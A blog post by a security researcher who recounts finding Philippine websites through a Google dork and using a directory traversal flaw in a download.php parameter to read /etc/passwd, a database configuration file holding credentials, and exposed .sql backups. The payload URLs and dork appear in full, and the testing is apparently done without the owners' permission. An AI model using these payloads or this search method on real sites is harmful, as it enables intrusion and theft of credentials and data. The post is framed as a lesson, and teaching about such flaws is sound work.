Image from https://metafied.wordpress.com/2015/04/27/troubleshoot-etcpasswd-file/ is a method which allows the attacker to access restricted directories and files within the website and execute a command outside the web server’s root directory. Directory Traversal hacking Weekends, No work, Chill Time. So, I decided to test the security of a website. I started it by using a (Advanced Search Technique on Google) Google Dork site:.ph inurl:”Upload/download.php” Executing the dork above on Google gives me these results: So, I got 4 results with same Scheme URL site.ph/Upload/download.php?b=something&d=something&t=something I figured out that the parameter is the File Name, parameter is directory of the file, and parameter is the MIME type of the file. “b” “d” “t” So, It quickly reminds me that this kind of URL Scheme is possibly vulnerable to Directory Traversal. Here’s the URL I browsed to test if the site is vulnerable to Directory Traversal: site.ph/Upload/download.php?b=Test.txt&d=../../../../../../../../../../etc/passwd&t=text/html After browsing the URL above, something popped out and asked me to download a file and here’s the content of the file I have downloaded. Yes, they’re vulnerable! Now, it’s time to use a tool to enumerate their directory and find some interesting files. While the tool is enumerating directories and files, I noticed a file called connectDB.php and I know I can do directory traversal to download the file. So, here’s the payload I used: site.ph/Upload/download.php?b=Test.txt&d=../something/something/connectDB.php&t=text/html Yes, I have successfully download the connectDB.php file and here’s the content of the file: <?php//$cnx_id = (‘localhost’,’root’,’’);$cnx_id = (‘localhost’,’admin’,’admin@abcdef'); (‘redactedDB’);?> @mysql_pconnect @mysql_pconnect @mysql_select_db Alright! I got their Database Details but what if there’s something more? So, I ran the tool again to enumerate more directory and files. What? A DB(Database) Directory? Is it a login page to database or a collection of backed up databases? Let’s find out: So, I browsed the and found theses files: site.ph/db/ .sql Okay, I’m done. I hope you learned something with this blog. :) Allan Jay Dumanhug is the Founder and CEO of , a security program management service. Prior to Secuna, Allan worked as an IT Security Analyst at University of the Philippines Diliman eUP Project and former top hacker on Facebook(Q1 of 2016) and HackerOne. Secuna Please visit for more info. https://secuna.ph/
